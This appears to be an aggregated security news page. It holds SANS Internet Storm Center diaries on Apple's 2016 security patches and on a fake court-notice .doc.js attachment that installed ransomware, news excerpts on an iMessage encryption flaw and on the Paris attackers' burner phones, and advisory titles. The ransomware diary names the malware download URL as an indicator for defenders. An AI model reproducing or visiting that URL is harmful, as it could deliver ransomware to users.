(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

As part of todays product announcements, Apple released new operating systems across its different products. In addition to new features, these updates do address a number of security issues as well.

OS X Server 5.1 ( for Yosemite 10.10.5 )

This update improves warnings in case the administrator stores backups insecurely and removes old SSL ciphers (RC4). Also, authentication bypass issues are addressed in the Wiki.

Safari 9.1

The Safari update is available for OS X back to 10.9 (Mavericks). It fixes a total of 12 vulnerabilities, some can be used to execute arbitrary code.

OS X El Capitan 10.11.4 (Security Update 2016-002)

A total of 59 vulnerabilities are patched (I hope I counted them right). Here are some of the highlights:

Apple USB Networking (CVE-2016-1734): This vulnerability could lead to arbitrary code execution if a malicious USB devices is connected to the computer.

Bluetooth (CVE-2016-1735/1736): Bluetooth can be used to execute arbitrary code. It isnt clear (but likely) that you first need to pair with the device which would mitigate the problem somewhat.

Messages (CVE-2016-1788): This vulnerability, which would allow the interception of iMessage messages has gotten a lot of press in the last couple days.

OpenSSH (CVE-2016-0777,0778): The roaming vulnerablity that could lead to a leak of the private key is fixed in this patch.

Wi-Fi (CVE-2016-0801/0802): A malicious WiFi frame could be used to execute arbitrary code. Since this requires an unspecified ether type, I am assuming that this requires that the victim first associates with the network. But the advisory doesnt provide sufficient details to tell for sure.

XCode 7.3:

Two vulnerabilities. One in otool (a tool to display object files) and another two vulnerabilities in subversion.

WatchOS 2.2:

A lot of overlap here with the OS X and Safari patches. Note that the Watch is also vulnerable to the WiFi exploits, but not the Bluetooth issues.

iOS 9.3:

A total of 36 vulnerabilities, many of which are also patched for OS X. The Wifi vulnerability applies to iOS just as for the WatchOS and OS X.

TVOS 9.2

Again a lot of overlap with the other updates.

In short: patch...

For details from Apple, please refer to the usual security bulletin page:https://support.apple.com/en-us/HT201222

Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

We got the following message from our reader Steven:

">Yesterday I received an email regarding STEVEN, Notice to Appear in Court on March 28"> the folder and scanned the .doc.js file with Avast, and it said there was no problem. So I double clicked on the .doc.js file. Nothing happened. I then changed the file name, removing .js from the extension. I clicked on the file and it opened in Word. Upon seeing the mess of text letters, I became alarmed and then found your webpage:">

I think the message does make some important points: Malicious spam does work. It just has to hit the right person. Just like Steven had a court appointment, others may be waiting for a shipping confirmation or are waiting for an airplane ticket they just booked. Attacks do not have to work every time, and even a relatively small success rate is still a win for the attacker.

In this case, I ran the script in a Windows 8.1 virtual machine. Windows Defender blocked it (the only anti-Malware I have on the system). The javascript then as expected downloaded crypto-ransomware. The ransomware went ahead and renamed various files by adding the .crypted extension, and went ahead encrypting files.

Anti-Virus coverage was pretty decent for the unzipped attachment according to Virustotal. But it looks like Stevens copy of Avast did let this sample slip past.

Doing a quick analysis of the PCAP, it looks like the actual malware was downloaded from

http://wambofantacalcio.it / counter/?ad=1N....[long string]dc=[6 digit number]

Anti-Viruscoverage on the binary is mixed, with Symantec identifying it as Cryptolocker:

Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
[security bulletin] HPSBMU03562 rev.1 - HPE Service Manager using Java Deserialization, Remote Arbitrary Code Execution
[security bulletin] HPSBGN03551 rev.1 - HPE Helion Development Platform using glibc, Remote Denial of Service (DoS), Arbitrary Code Execution
[security bulletin] HPSBGN03560 rev.1 - HP Operations Orchestration using Java Deserialization, Remote Arbitrary Code Execution

Apple's widely used iMessage communications platform contains a currently unpatched flaw that allowed attackers to decrypt a photo stored on the company's iCloud backup system, according to an article published by The Washington Post.

The vulnerability was discovered by a team of researchers from Johns Hopkins University. According to the Post, the researchers were able to exploit the bug by mimicking an Apple server and then painstakingly chipping away at the encryption protecting the photo, which was sent as a link over iMessage. They eventually were able to obtain the encryption key used to protect the photo by guessing each of its underlying 64 digits in what's known as a brute-force attack.

The vulnerability came to light as the FBI is trying to force Apple to write software that defeats security features built into an iPhone used by one of the San Bernardino shooters. Apple, joined by many security and privacy advocates, has bitterly opposed the move and warned that such action can ultimately diminish the security of smartphones everywhere. This iMessage flaw is probably of little benefit to FBI in pulling data from the iPhone of San Bernardino shooter Syed Rizwan Farouk, who along with his wife took part in a shooting rampage that killed 14 people. Still, the bug underscores what security people have long known—cryptography is excruciatingly hard to get right, and common bugs often leave an opening for law enforcement agents and criminal hackers.

Read 3 remaining paragraphs | Comments


(credit: Aaron Gustafson)

New details of the Paris attacks carried out last November reveal that it was the consistent use of prepaid burner phones, not encryption, that helped keep the terrorists off the radar of the intelligence services.

As an article in The New York Times reports: "the three teams in Paris were comparatively disciplined. They used only new phones that they would then discard, including several activated minutes before the attacks, or phones seized from their victims."

The article goes on to give more details of how some phones were used only very briefly in the hours leading up to the attacks. For example: "Security camera footage showed Bilal Hadfi, the youngest of the assailants, as he paced outside the stadium, talking on a cellphone. The phone was activated less than an hour before he detonated his vest." The information come from a 55-page report compiled by the French antiterrorism police for France’s Interior Ministry.

Read 9 remaining paragraphs | Comments

[SECURITY] [DSA 3522-1] squid3 security update
[SECURITY] [DSA 3523-1] iceweasel security update
[SECURITY] [DSA 3524-1] activemq security update
AbsoluteTelnet 10.14 DLL Hijack Code Exec
Internet Storm Center Infocon Status